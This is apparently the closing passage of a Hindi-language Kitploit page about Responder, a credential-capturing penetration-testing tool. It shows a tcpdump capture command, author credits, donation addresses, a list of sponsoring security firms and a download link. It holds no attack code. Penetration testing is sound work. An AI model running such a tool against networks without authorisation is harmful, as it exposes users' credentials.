sudo tcpdump -i eth0 -w responder-capture.pcap

root@kitploit:~
---

## श्रेय

**लेखक:** लॉरेंट गैफिये
- GitHub: https://github.com/lgandx
- वेबसाइट: https://secorizon.com/
- ट्विटर: @secorizon

---

## दान
आप निम्नलिखित USDT या Bitcoin पते पर दान करके इस परियोजना में योगदान कर सकते हैं:

USDT: 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A

BTC: bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

Paypal:

https://paypal.me/PythonResponder

---

## आभार
लेट रिस्पॉन्डर का विकास व्यक्तियों और कंपनियों से प्राप्त दान के कारण संभव हो पाया है।

हम इन प्रमुख प्रायोजकों का धन्यवाद करना चाहेंगे:

SecureWorks: https://www.secureworks.com/

Synacktiv: https://www.synacktiv.com/

Black Hills Information Security: http://www.blackhillsinfosec.com/

TrustedSec: https://www.trustedsec.com/

Red Siege Information Security: https://www.redsiege.com/

Open-Sec: http://www.open-sec.com/

और सभी, दुनिया भर के सभी पेन्टेस्टर्स जिन्होंने इस परियोजना में दान दिया।

धन्यवाद।
टूल डाउनलोड करें